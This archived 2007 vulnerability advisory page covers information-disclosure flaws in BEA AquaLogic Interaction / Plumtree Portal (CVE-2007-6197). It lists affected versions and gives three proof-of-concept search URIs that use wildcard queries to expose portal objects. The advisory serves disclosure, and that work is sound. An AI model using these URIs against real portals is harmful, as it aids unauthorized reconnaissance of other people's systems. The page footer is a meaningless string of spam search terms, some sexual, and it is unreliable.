about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , BEA AquaLogic Interaction Plumtree Portal Multiple Information Disclosure Vulnerabilities


Title BEA AquaLogic Interaction Plumtree Portal Multiple Information Disclosure Vulnerabilities
Published 2007-11-28-12:00AM
Updated 2007-12-05-04:52PM
Class Design Error
CVE   CVE-2007-6197 E-2007-6198
Remote  Yes
Local  No
Credit  Adrian Pastor <adrian.pastor [at] procheckup.com> and Jan Fry <jan.fry [at] procheckup.com> from ProCheckUp Ltd are credited with the discovery of these issues.
Vulnerable  BEA Systems Plumtree Foundation 5.0.4
BEA Systems Plumtree Foundation 5.0.3
BEA Systems Plumtree Foundation 5.0.2
BEA Systems Plumtree Foundation 6.0 SP1
BEA Systems Plumtree Foundation 6.0
BEA Systems AquaLogic Interaction 6.1 MP1
BEA Systems AquaLogic Interaction 6.0
Not Vulnerable  
Code  Attackers can exploit these issues via a browser.The following proof-of-concept URIs are available:https://www.example.com/portal/server.pt?in_hi_req_objtype=1&amp;space=SearchResult&amp;in_tx_fulltext=*&amp;in_hi_req_ apps=1&amp;control=advancedstart&amp;in_hi_req_page=100&amp;parentname=AdvancedSearch&amp;in_ra_ topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&amp;space=SearchResult&amp;in_tx_fulltext=*admin*&amp;in_hi_ req_apps=1&amp;control=advancedstart&amp;in_hi_req_page=100&amp;parentname=AdvancedSearch&amp;in_ra_ topoperator=and
https://www.example.com/portal/server.pt?in_hi_req_objtype=1&amp;space=SearchResult&amp;in_tx_fulltext=*test*&amp;in_hi_req_apps= 1&amp;control=advancedstart&amp;in_ hi_req_page=100&amp;parentname=AdvancedSearch&amp;in_ra_topoperator=and
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Tue, 02 Dec 2008 10:26:33 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.tharun woman pict www.trish sxe inject movingsex t97t www.kmzlws WWWWORLDSE myspace.cm t299t movingsex Wwwsoo18 hi+im+moha easygals.c henai mascos x 1 arcserv an www.tamils Www.Video dogsexcom www.tamils www.gaoqin php-nuke 2 www.sextoy news for C sexyphoto. Www.3733.c php-nuke 2 www.google trisha sex php-nuke 2 trisha sex trisha sex opensex Nazleenjal sexy grils phpBB por news for c www.teenbo msn exploi www.sex oc sexy grils PHP Advanc www.4sexy. mambo Remo phpBB++por sexygirles Tamil actr www.preast splinter c